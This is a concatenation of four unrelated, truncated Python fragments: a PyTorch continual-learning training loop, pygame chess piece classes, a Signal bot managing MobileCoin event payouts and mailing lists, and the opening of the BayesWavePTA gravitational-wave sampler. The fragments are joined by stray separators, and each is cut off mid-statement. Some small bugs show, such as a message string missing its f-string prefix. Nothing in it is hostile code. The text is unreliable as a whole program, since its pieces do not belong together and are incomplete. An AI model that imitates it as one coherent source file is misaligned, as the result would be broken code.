str.remove(102)
len1 = len(str)
if len1 == 1:
cut = 1
else:
cut = np.random.randint(1, len1)
str = str[cut:] + [102] + str[:cut] + [102]
return str
def get_permutation_batch(src, src_mask):
#create negative samples for Next Sentence Prediction
batch_size = src.size(0)
length = src.size(1)
dst = []
dst_mask = []
lbl = []
for i in range(batch_size):
cur = src[i]
mask = src_mask[i].tolist()
first_pad = (cur.tolist() + [0]).index(0)
cur = cur[1:first_pad].tolist()
cur = change_string(cur)
lbl.append(1)
padding = [0] * (length - len(cur) - 1)
dst.append(torch.tensor([101] + cur + padding))
dst_mask.append(torch.tensor(mask))
return torch.stack(dst).to(device), torch.stack(dst_mask).to(device), torch.tensor(lbl).to(device)
def train_step(model, optimizer, nsp_CR, cls_CR, x, mask, y, t, task_id, replay,
x_feature, predictor, optimizer_P, scheduler, scheduler_P):
batch_size = x.size(0)
model.train()
predictor.train()
model.zero_grad()
predictor.zero_grad()
x = random_seq(x)
pre_lbl = None
# If Next Sentence Prediction is added, augment the training data with permuted data
if args.disen:
p_x, p_mask, p_lbl = get_permutation_batch(x, mask)
x = torch.cat([x, p_x], dim=0)
mask = torch.cat([mask, p_mask], dim=0)
r_lbl = torch.zeros_like(p_lbl)
nsp_lbl = torch.cat([r_lbl, p_lbl], dim=0)
y = torch.cat([y, y], dim=0)
t = torch.cat([t, t], dim=0)
total_g_fea, total_s_fea, cls_pred, task_pred, _ = model(x, mask)
if args.disen:
g_fea = total_g_fea[:batch_size, :]
s_fea = total_s_fea[:batch_size, :]
else:
g_fea = total_g_fea
s_fea = total_s_fea
# Calculate classification loss
_, pred_cls = cls_pred.max(1)
correct_cls = pred_cls.eq(y.view_as(pred_cls)).sum().item()
cls_loss = cls_CR(cls_pred, y)
task_loss = torch.tensor(0.0).to(device)
reg_loss = torch.tensor(0.0).to(device)
nsp_loss = torch.tensor(0.0).to(device)
# Calculate regularization loss
if x_feature is not None and args.reg is True:
fea_len = g_fea.size(1)
g_fea = g_fea[:batch_size, :]
s_fea = s_fea[:batch_size, :]
old_g_fea = x_feature[:, :fea_len]
old_s_fea = x_feature[:, fea_len:]
reg_loss += args.regspe * torch.nn.functional.mse_loss(s_fea, old_s_fea) + \
args.reggen * torch.nn.functional.mse_loss(g_fea, old_g_fea)
if replay and task_id > 0:
reg_loss *= args.regcoe_rply
elif not replay and task_id > 0:
reg_loss *= args.regcoe
elif task_id == 0:
reg_loss *= 0.0 #no reg loss on the 1st task
# Calculate task loss only when in replay batch
task_pred = task_pred[:, :task_id + 1]
_, pred_task = task_pred.max(1)
correct_task = pred_task.eq(t.view_as(pred_task)).sum().item()
if task_id > 0 and replay:
task_loss += args.tskcoe * cls_CR(task_pred, t)
# Calculate Next Sentence Prediction loss
nsp_acc = 0.0
if args.disen:
nsp_output = predictor(total_g_fea)
nsp_loss += args.nspcoe * nsp_CR(nsp_output, nsp_lbl)
_, nsp_pred = nsp_output.max(1)
nsp_correct = nsp_pred.eq(nsp_lbl.view_as(nsp_pred)).sum().item()
nsp_acc = nsp_correct * 1.0 / (batch_size * 2.0)
loss = cls_loss + task_loss + reg_loss + nsp_loss
loss.backward()
optimizer.step()
scheduler.step()
if args.disen:
optimizer_P.step()
scheduler_P.step()
return nsp_acc, correct_cls, correct_task, nsp_loss.item(), task_loss.item(), cls_loss.item(), reg_loss.item()
def validation(model, t, validation_loaders):
model.eval()
acc_list = []
with torch.no_grad():
avg_acc = 0.0
for i in range(t + 1):
valid_loader = validation_loaders[i]
total = 0
correct = 0
for x, mask, y in valid_loader:
x, mask, y = x.to(device), mask.to(device), y.to(device)
batch_size = x.size(0)
g_fea, s_fea, cls_pred, _, _ = model(x, mask)
_, pred_cls = cls_pred.max(1)
correct += pred_cls.eq(y.view_as(pred_cls)).sum().item()
total += batch_size
print("acc on task {} : {}".format(i, correct * 100.0 / total))
avg_acc += correct * 100.0 / total
acc_list.append(correct * 100.0 / total)
return avg_acc / (t + 1), acc_list
def select_samples_to_store(model, buffer, data_loader, task_id):
### ----------- add examples to memory ------------------ ##
x_list = []
mask_list = []
y_list = []
fea_list = []
model.eval()
with torch.no_grad():
for x, mask, y in data_loader:
x = x.to(device)
mask = mask.to(device)
y = y.to(device)
_, _, _, _, bert_emb = model(x, mask)
x_list.append(x.to("cpu"))
mask_list.append(mask.to("cpu"))
y_list.append(y.to("cpu"))
# Kmeans on bert embedding
fea_list.append(bert_emb.to("cpu"))
x_list = torch.cat(x_list, dim=0).data.cpu().numpy()
mask_list = torch.cat(mask_list, dim=0).data.cpu().numpy()
y_list = torch.cat(y_list, dim=0).data.cpu().numpy()
fea_list = torch.cat(fea_list, dim=0).data.cpu().numpy()
# if use KMeans
if args.kmeans:
n_clu = int(args.store_ratio * len(x_list))
estimator = KMeans(n_clusters=n_clu, random_state=args.seed)
estimator.fit(fea_list)
label_pred = estimator.labels_
centroids = estimator.cluster_centers_
for clu_id in range(n_clu):
index = [i for i in range(len(label_pred)) if label_pred[i] == clu_id]
closest = float("inf")
closest_x = None
closest_mask = None
closest_y = None
for j in index:
dis = np.sqrt(np.sum(np.square(centroids[clu_id] - fea_list[j])))
if dis < closest:
closest_x = x_list[j]
closest_mask = mask_list[j]
closest_y = y_list[j]
closest = | |
<gh_stars>0
import pygame
from pygame.locals import *
class Piece():
def __init__(self, window, board_start, tile_size, value, team, image, origin):
self.value = value
self.window = window
self.board_start = board_start
self.tile_size = tile_size
self.team = team
self.image = image
self.origin = origin
self.moves = []
self.taken = False
def render(self):
if not self.taken:
self.window.blit(self.image, self.pos)
def send_to_origin(self, board_start, tile_size):
self.tile = self.origin
self.pos = [board_start[0] + tile_size * self.tile[0] + self.offset[0],
board_start[1] + tile_size * self.tile[1] + self.offset[1]]
def taken(self):
pass
def get_team(self):
return self.team
def get_piece(self):
return self.piece
def get_tile(self):
return self.tile
def get_never_moved(self):
return self.never_moved
def set_taken(self, taken):
self.taken = taken
def set_tile(self, tile):
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
#-------------------------------------------------------------------------------------------------------------------
class King(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "King"))
image = pygame.transform.scale(image, (int(scale_factor * ratio), int(scale_factor)))
self.offset = [tile_size * 0.25, tile_size * 0.1]
self.piece = "King"
self.never_moved = True
super().__init__(window, board_start, tile_size, 9999, team, image, origin)
def get_moves(self, board_state):
self.moves = []
possibilities = [[1,1], [0,1], [-1,1], [-1,0], [-1,-1], [0,-1], [1,-1], [1,0]]
for i in range(8):
tile = [self.tile[0] + possibilities[i][0], self.tile[1] + possibilities[i][1]]
if tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
#Castling
if self.never_moved:
if self.team == "white":
#King side
if board_state[7][7] != 0:
if (board_state[7][7].get_piece() == "Rook" and board_state[7][7].get_never_moved() and
board_state[6][7] == 0 and board_state[5][7] == 0):
self.moves.append([7, 7])
#Queen side
if board_state[0][7] != 0:
if (board_state[0][7].get_piece() == "Rook" and board_state[0][7].get_never_moved() and
board_state[1][7] == 0 and board_state[2][7] == 0 and board_state[3][7] == 0):
self.moves.append([0, 7])
elif self.team == "black":
#King side
if board_state[7][0] != 0:
if (board_state[7][0].get_piece() == "Rook" and board_state[7][0].get_never_moved() and
board_state[6][0] == 0 and board_state[5][0] == 0):
self.moves.append([7, 0])
#Queen side
if board_state[0][0] != 0:
if (board_state[0][0].get_piece() == "Rook" and board_state[0][0].get_never_moved() and
board_state[1][0] == 0 and board_state[2][0] == 0 and board_state[3][0] == 0):
self.moves.append([0, 0])
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
#Castling
if clicked_state != 0 and clicked_state.get_piece() == "Rook":
#King's Side
if tile[0] == 7:
clicked_state.move([tile[0] - 2, tile[1]], clicked_state, board_state, pieces)
self.tile = [tile[0] - 1, tile[1]]
#Queen's Side
elif tile[0] == 0:
clicked_state.move([tile[0] + 3, tile[1]], clicked_state, board_state, pieces)
self.tile = [tile[0] + 2, tile[1]]
else:
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.never_moved = False
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
def get_never_moved(self):
return self.never_moved
#-------------------------------------------------------------------------------------------------------------------
class Queen(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Queen"))
image = pygame.transform.scale(image, (int(scale_factor * ratio), int(scale_factor)))
self.offset = [tile_size * 0.25, tile_size * 0.1]
self.piece = "Queen"
super().__init__(window, board_start, tile_size, 9, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[0, 1], [0, -1], [1, 0], [-1, 0], [1, 1], [-1, 1], [1, -1], [-1, -1]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Bishop(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Bishop"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Bishop"
super().__init__(window, board_start, tile_size, 3, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[1, 1], [-1, 1], [1, -1], [-1, -1]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Knight(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Knight"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Knight"
super().__init__(window, board_start, tile_size, 3, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[1, 2], [2, 1], [2, -1], [1, -2], [-1, -2], [-2, -1], [-2, 1], [-1, 2]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
if tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Rook(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Rook"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Rook"
self.never_moved = True
super().__init__(window, board_start, tile_size, 5, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.never_moved = False
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
def get_never_moved(self):
return self.never_moved
#-------------------------------------------------------------------------------------------------------------------
class Pawn(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Pawn"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.8), int(scale_factor * 0.8)))
self.offset = [tile_size * 0.3, tile_size * 0.2]
self.piece = "Pawn"
self.en_passant = False
self.never_moved = True
super().__init__(window, board_start, tile_size, 1, team, image, origin)
if self.team == "white":
self.direction = -1
else:
self.direction = 1
def get_moves(self, board_state):
self.moves = []
#Moving forward
if board_state[self.tile[0]][self.tile[1] + 1 * self.direction] == 0:
self.moves.append([self.tile[0], self.tile[1] + 1 * self.direction])
#Double Move
if self.never_moved:
if board_state[self.tile[0]][self.tile[1] + 2 * self.direction] == 0:
self.moves.append([self.tile[0], self.tile[1] + 2 * self.direction])
#Diagonal take
if self.tile[0] != 7:
if board_state[self.tile[0] + 1][self.tile[1] + 1 * self.direction] != 0:
if board_state[self.tile[0] + 1][self.tile[1] + 1 * self.direction].get_team() != self.team:
self.moves.append([self.tile[0] + 1, self.tile[1] + 1 * self.direction])
#En-Passant
if (board_state[self.tile[0] + 1][self.tile[1]] != 0 and board_state[self.tile[0] + 1][self.tile[1]].get_piece() == "Pawn" and
board_state[self.tile[0] + 1][self.tile[1]].get_en_passant() and
board_state[self.tile[0] + 1][self.tile[1]].get_team() != self.team):
self.moves.append([self.tile[0] + 1, self.tile[1] + 1 * self.direction])
if self.tile[0] != 0:
if board_state[self.tile[0] - | |
#!/usr/bin/python3.9
# Copyright (c) 2021 MobileCoin Inc.
# Copyright (c) 2021 The Forest Team
import asyncio
import json
import string
import time
import math
import logging
from decimal import Decimal
from typing import Optional
from forest import utils
from forest.core import (
Message,
Response,
hide,
requires_admin,
is_admin,
get_uid,
run_bot,
)
from forest.extra import DialogBot
from forest.pdictng import aPersistDict, aPersistDictOfInts, aPersistDictOfLists
from mc_util import pmob2mob
FEE = int(1e12 * 0.0004)
class Hotline(DialogBot): # pylint: disable=too-many-public-methods
def __init__(self) -> None:
self.no_repay: list[str] = []
self.pending_orders: aPersistDict[str] = aPersistDict("pending_orders")
self.pending_funds: aPersistDict[str] = aPersistDict("pending_funds")
self.pending_donations: aPersistDict[str] = aPersistDict("pending_donations")
self.event_limits = aPersistDictOfInts("event_limits")
self.event_prompts: aPersistDict[str] = aPersistDict("event_prompts")
self.event_prices: aPersistDict[float] = aPersistDict("event_prices")
# self.event_images: aPersistDict[str] = aPersistDict("event_images")
self.event_owners: aPersistDictOfLists[str] = aPersistDictOfLists(
"event_owners"
)
self.event_attendees: aPersistDictOfLists[str] = aPersistDictOfLists(
"event_attendees"
)
self.event_lists: aPersistDictOfLists[str] = aPersistDictOfLists("event_lists")
self.list_owners: aPersistDictOfLists[str] = aPersistDictOfLists("list_owners")
self.easter_eggs: aPersistDict[str] = aPersistDict("easter_eggs")
self.successful_pays: aPersistDictOfLists[str] = aPersistDictOfLists(
"successful_pays"
)
self.payout_balance_mmob = aPersistDictOfInts("payout_balance_mmob")
self.challenging: aPersistDict[bool] = aPersistDict("challenging")
self.charities: aPersistDict[str] = aPersistDict("charities")
self.charities_balance_mmob: aPersistDictOfInts = aPersistDictOfInts(
"charities_balance_mmob"
)
self.scratch_pad: aPersistDict[str] = aPersistDict("scratch_pad")
self.pay_lock: asyncio.Lock = asyncio.Lock()
self.donations: aPersistDict[str] = aPersistDict("donations")
self.first_messages: aPersistDict[int] = aPersistDict("first_messages")
self.last_prompted: aPersistDict[int] = aPersistDict("last_prompted")
# okay, this now maps the tag (restore key) of each of the above to the instance of the PersistDict class
self.state = {
self.__getattribute__(attr).tag: self.__getattribute__(attr)
for attr in dir(self)
if isinstance(self.__getattribute__(attr), aPersistDict)
}
super().__init__()
@requires_admin
async def do_dump(self, msg: Message) -> Response:
"""dump | dump <event>
returns a JSON serialization of an event (or all events)"""
obj = (msg.arg1 or "").lower()
dump = {}
for eventcode in list(await self.event_owners.keys()) + list(
await self.list_owners.keys()
):
event = {}
for parameters in self.state:
if await self.state[parameters].get(eventcode):
event[parameters] = await self.state[parameters].get(eventcode)
dump[eventcode] = event
return json.dumps(dump if not obj else dump.get(obj), indent=2)
async def check_user_owns(self, user_uuid: str, list_name: str) -> Optional[str]:
"""returns 'event' if the user owns the specified event, or 'list' if the user owns the list."""
if user_uuid in await self.event_owners.get(list_name.lower(), []):
return "event"
if user_uuid in await self.list_owners.get(list_name.lower(), []):
return "list"
return None
async def do_check(self, msg: Message) -> Response:
"""check | check <list_or_event>
returns all lists the user's on, or optionally info about a specified list."""
obj = (msg.arg1 or "").lower()
user = msg.uuid or msg.source
if msg.arg1 and await self.check_user_owns(user, msg.arg1):
return "\n\n".join(
[
f"code: {obj}",
f"prompt: {await self.event_prompts.get(obj)}",
f"limit: {await self.event_limits.get(obj)}",
f"join price: {await self.event_prices.get(obj, 0)}MOB/ea",
f"event owned by: {[await self.get_displayname(uuid) for uuid in await self.event_owners.get(obj, [])]}",
f"announce list owned by: {[await self.get_displayname(uuid) for uuid in await self.list_owners.get(obj, [])]}",
f"number paid attendees: {len(await self.event_attendees.get(obj, []))}",
f"paid attendees: {[await self.get_displayname(uuid) for uuid in await self.event_attendees.get(obj, [])]}",
f"list has {len(await self.event_lists.get(obj,[]))} members",
f"list members: {[await self.get_displayname(uuid) for uuid in await self.event_lists.get(obj, [])]}",
f"CAPTCHA enabled: {await self.challenging.get(obj, False)}",
f"balance: {await self.payout_balance_mmob.get(obj, 0)}mmob",
]
)
lists_ = [
list_
for list_ in await self.event_lists.keys()
if user in await self.event_lists.get(list_, [])
]
owns_event, owns_list = await self._get_user_owns(user)
return f"You're on the list for {lists_}.\n\nYou own these paid events: {owns_event}\n\nYou own these free lists: {owns_list}\n\nFor more information reply: check <code>."
async def do_stop(self, msg: Message) -> Response:
"""stop | stop <list>
Removes user from all lists (optionally, specified list)."""
removed = 0
if msg.arg1 and msg.uuid in await self.event_lists.get(
(msg.arg1 or "").lower(), []
):
await self.event_lists.remove_from((msg.arg1 or "").lower(), msg.uuid)
return f"Okay, removed you from {msg.arg1}"
if not msg.arg1:
for list_ in await self.event_lists.keys():
if msg.uuid in await self.event_lists.get(list_, []):
await self.event_lists.remove_from(list_, msg.uuid)
await self.send_message(
msg.uuid,
f"Removed you from list {list_}, to rejoin send 'subscribe {list_}'",
)
removed += 1
if msg.arg1 and not removed:
return f"Sorry, you're not on the announcement list for {msg.arg1}" # thanks y?!
if not removed:
return "You're not on any lists!"
return None
@hide
async def do_payout(self, msg: Message) -> Response:
"""Sweeps all balance for an event to the requesting owner.
Prompts admin for approval."""
# pylint: disable=too-many-return-statements
user = msg.uuid
list_ = (msg.arg1 or "").lower()
user_owns = await self.check_user_owns(user, list_)
balance = await self.payout_balance_mmob.get(list_, 0)
if is_admin(msg) or (user_owns and balance):
if not await self.ask_yesno_question(
utils.get_secret("ADMIN"),
f"Owner of {list_} requests payout of {balance}. Approve?",
):
return "Sorry, admin rejected your payout."
return await self.pay_user_from_balance(user, list_, balance - 1)
return "Sorry, no luck"
async def pay_user_from_balance(
self, user: str, list_: str, amount_mmob: int
) -> Optional[str]:
"""Pays a user a given amount of MOB by manually grabbing UTXOs until a transaction can be made.
Assumptions made:"""
# pylint: disable=too-many-return-statements,too-many-locals,too-many-branches
balance = await self.payout_balance_mmob.get(list_, 0)
await self.send_typing(recipient=user)
# pad fees
logging.debug(f"PAYING {amount_mmob}mmob from {balance} of {list_}")
if amount_mmob < balance:
async with self.pay_lock:
utxos = list(reversed((await self.mobster.get_utxos()).items()))
input_pmob_sum = 0
input_txo_ids = []
# dust
skipped_utxos = []
# acquire utxos
while input_pmob_sum < ((amount_mmob + 1) * 1_000_000_000):
if utxos:
# get a txoid and amount to check
txoid, pmob = utxos.pop()
else:
# no utxos left, we've reviewed all of the available ones.
# release so the recursively instantiated children calls can re-acquire
self.pay_lock.release()
# recurse with smaller amounts
first_half = await self.pay_user_from_balance(
user, list_, amount_mmob // 2
)
# if first leg succeeds..
if first_half and "Paid" in first_half:
# let's do it again
second_half = await self.pay_user_from_balance(
user, list_, amount_mmob // 2
)
# and if we're winning
if second_half and "Paid" in second_half:
# acquire to exit-handler more nicely
await self.pay_lock.acquire()
return f"Paid you you {amount_mmob/1000}MOB"
else:
# sadly acquire lock in defeat
await self.pay_lock.acquire()
return None
if pmob < (amount_mmob * 1_000_000_000) // 15:
logging.debug(f"skipping UTXO worth {pmob}pmob")
skipped_utxos += [(txoid, pmob)]
continue
input_txo_ids += [txoid]
input_pmob_sum += pmob
if len(input_txo_ids) > 15:
return "Something went wrong! Please contact your administrator for support. (too many utxos needed)"
# how many slots do we have for dust?
dust_space = 16 - len(input_txo_ids)
# grab dust up to 16 utxos total or up to # dust, whichever is smaller
logging.info(
f"Space for {dust_space}, we have {len(skipped_utxos)} presumed dust!"
)
for _ in range(min(dust_space, len(skipped_utxos))):
# smallest dust = higher priority for cleaning
dust_txoid, dust_val_pmob = skipped_utxos.pop(0)
input_txo_ids.append(dust_txoid)
logging.debug(
f"grabbing dust worth {dust_val_pmob}pmob to fill empty space in transaction inputs"
)
input_pmob_sum += dust_val_pmob
logging.debug(
f"found: {input_pmob_sum} / {amount_mmob*1_000_000_000} across {len(input_txo_ids)}utxos"
)
if not input_txo_ids:
return "Something went wrong! Please contact your administrator for support. (not enough utxos)"
# build a memo lookup key for the relevant list
MEMO_KEY = "PAY_MEMO_" + list_
# attempt to fetch PAY_MEMO_list_ falling back to DEFAULT_PAY_MEMO
memo_dialog = await self.dialog.get(
MEMO_KEY, None
) or await self.dialog.get("DEFAULT_PAY_MEMO", "DEFAULT_PAY_MEMO")
result = await self.send_payment(
recipient=user,
amount_pmob=(amount_mmob * 1_000_000_000),
receipt_message=memo_dialog,
input_txo_ids=input_txo_ids,
confirm_tx_timeout=60,
)
await self.send_typing(recipient=user, stop=True)
if result and result.status == "tx_status_succeeded":
await self.payout_balance_mmob.decrement(list_, amount_mmob)
return f"Paid you you {amount_mmob/1000}MOB"
return None
if not balance:
return "Sorry, {list_} has 0mmob balance!" # thanks y?!
return "Sorry, can't help you."
@hide
async def do_pay(self, msg: Message) -> Response:
"""Allows an event/list owner to distribute available funds across those on a list."""
user = msg.uuid
if not msg.arg2 or not msg.arg2.isnumeric():
msg.arg2 = await self.ask_freeform_question(
msg.uuid,
"How many mMOB should each recipient recieve (1000mMOB = 1MOB)?",
)
if msg.arg2 == "0":
return "OK, cancelling."
amount_mmob = 0 # excuse me?
list_, amount, message = (
(msg.arg1 or "").lower(),
(msg.arg2 or "0"),
msg.arg3 or msg.arg1 or "",
)
if not amount.isnumeric() or not amount:
msg.arg2 = await self.ask_freeform_question(
user, "Please provide an amount of milliMOB as a number:"
)
if msg.arg2 == "0":
return "OK, cancelling."
return await self.do_pay(msg)
amount_mmob = int(amount)
if not list_:
msg.arg1 = await self.ask_freeform_question(
user, "Who would you like to send the mMOB to?"
)
return await self.do_pay(msg)
user_owns = await self.check_user_owns(user, list_)
if not is_admin(msg) and not user_owns:
return "Sorry, you are not authorized."
return await self.pay_list(msg, amount_mmob, list_, message)
async def pay_list(
self,
msg: Message,
amount_mmob: int,
list_: str,
message: str,
) -> Response:
"Actually distribute funds across those on a list." ""
if not (
list_ in await self.event_lists.keys()
or list_ in await self.event_attendees.keys()
):
return "Sorry, that's not a valid list or number!"
to_send = await self.event_lists.get(
list_, | |
<reponame>bencebecsy/BayesWavePTA
################################################################################
#
#BayesWavePTA -- Bayesian search for burst GW signals in PTA data based on the BayesWave algorithm
#
#<NAME> (<EMAIL>) -- 2020
################################################################################
import numpy as np
import matplotlib.pyplot as plt
import json
import enterprise
import enterprise.signals.parameter as parameter
from enterprise.signals import signal_base
from enterprise.signals import white_signals
from enterprise.signals import gp_signals
from enterprise.signals import utils
from enterprise.signals import deterministic_signals
from enterprise.signals import selections
from enterprise.signals.selections import Selection
from enterprise_extensions.frequentist import Fe_statistic
import enterprise_wavelets as models
import pickle
import shutil
import os
################################################################################
#
#MAIN MCMC ENGINE
#
################################################################################
def run_bw_pta(N, T_max, n_chain, pulsars, max_n_wavelet=1, min_n_wavelet=0, n_wavelet_prior='flat', n_wavelet_start='random', RJ_weight=0, glitch_RJ_weight=0,
regular_weight=3, noise_jump_weight=3, PT_swap_weight=1, T_ladder=None, T_dynamic=False, T_dynamic_nu=300, T_dynamic_t0=1000, PT_hist_length=100,
tau_scan_proposal_weight=0, tau_scan_file=None, draw_from_prior_weight=0,
de_weight=0, prior_recovery=False, wavelet_amp_prior='uniform', gwb_amp_prior='uniform', rn_amp_prior='uniform', per_psr_rn_amp_prior='uniform',
gwb_log_amp_range=[-18,-11], rn_log_amp_range=[-18,-11], per_psr_rn_log_amp_range=[-18,-11], wavelet_log_amp_range=[-18,-11],
vary_white_noise=False, efac_start=None, include_equad_ecorr=False, wn_backend_selection=False, noisedict_file=None,
include_gwb=False, gwb_switch_weight=0,
include_rn=False, vary_rn=False, num_wn_params=1, num_total_wn_params=None, rn_params=[-13.0,1.0], include_per_psr_rn=False, vary_per_psr_rn=False, per_psr_rn_start_file=None,
jupyter_notebook=False, gwb_on_prior=0.5,
max_n_glitch=1, glitch_amp_prior='uniform', glitch_log_amp_range=[-18, -11], n_glitch_prior='flat', n_glitch_start='random', t0_min=0.0, t0_max=10.0, tref=53000*86400,
glitch_tau_scan_proposal_weight=0, glitch_tau_scan_file=None, TF_prior_file=None, f0_min=3.5e-9, f0_max=1e-7,
save_every_n=10000, savefile=None, safe_save=False, resume_from=None, start_from=None, n_status_update=100, n_fish_update=1000):
if num_total_wn_params is None:
num_total_wn_params = num_wn_params*len(pulsars)
if TF_prior_file is None:
TF_prior = None
else:
with open(TF_prior_file, 'rb') as f:
TF_prior = pickle.load(f)
ptas = get_ptas(pulsars, vary_white_noise=vary_white_noise, include_equad_ecorr=include_equad_ecorr, wn_backend_selection=wn_backend_selection, noisedict_file=noisedict_file, include_rn=include_rn, vary_rn=vary_rn, include_per_psr_rn=include_per_psr_rn, vary_per_psr_rn=vary_per_psr_rn, include_gwb=include_gwb, max_n_wavelet=max_n_wavelet, efac_start=efac_start, rn_amp_prior=rn_amp_prior, rn_log_amp_range=rn_log_amp_range, rn_params=rn_params, per_psr_rn_amp_prior=per_psr_rn_amp_prior, per_psr_rn_log_amp_range=per_psr_rn_log_amp_range, gwb_amp_prior=gwb_amp_prior, gwb_log_amp_range=gwb_log_amp_range, wavelet_amp_prior=wavelet_amp_prior, wavelet_log_amp_range=wavelet_log_amp_range, prior_recovery=prior_recovery, max_n_glitch=max_n_glitch, glitch_amp_prior=glitch_amp_prior, glitch_log_amp_range=glitch_log_amp_range, t0_min=t0_min, t0_max=t0_max, f0_min=f0_min, f0_max=f0_max, TF_prior=TF_prior, tref=tref)
print(ptas)
for i in range(len(ptas)):
for j in range(len(ptas[i])):
for k in range(len(ptas[i][j])):
print(i,j,k)
print(ptas[i][j][k].params)
#point_to_test = np.tile(np.array([0.0, 0.54, 1.0, -8.0, -13.39, 2.0, 0.5]),i+1)
print(ptas[-1][-1][-1].summary())
#setting up temperature ladder
if T_ladder is None:
#using geometric spacing
c = T_max**(1.0/(n_chain-1))
Ts = c**np.arange(n_chain)
#make highest temperature inf if dynamic T ladder is used
if T_dynamic:
Ts[-1] = np.inf
print("Using {0} temperature chains with a geometric spacing of {1:.3f}.\
Temperature ladder is:\n".format(n_chain,c),Ts)
else:
Ts = np.array(T_ladder)
n_chain = Ts.size
#make highest temperature inf if dynamic T ladder is used
if T_dynamic:
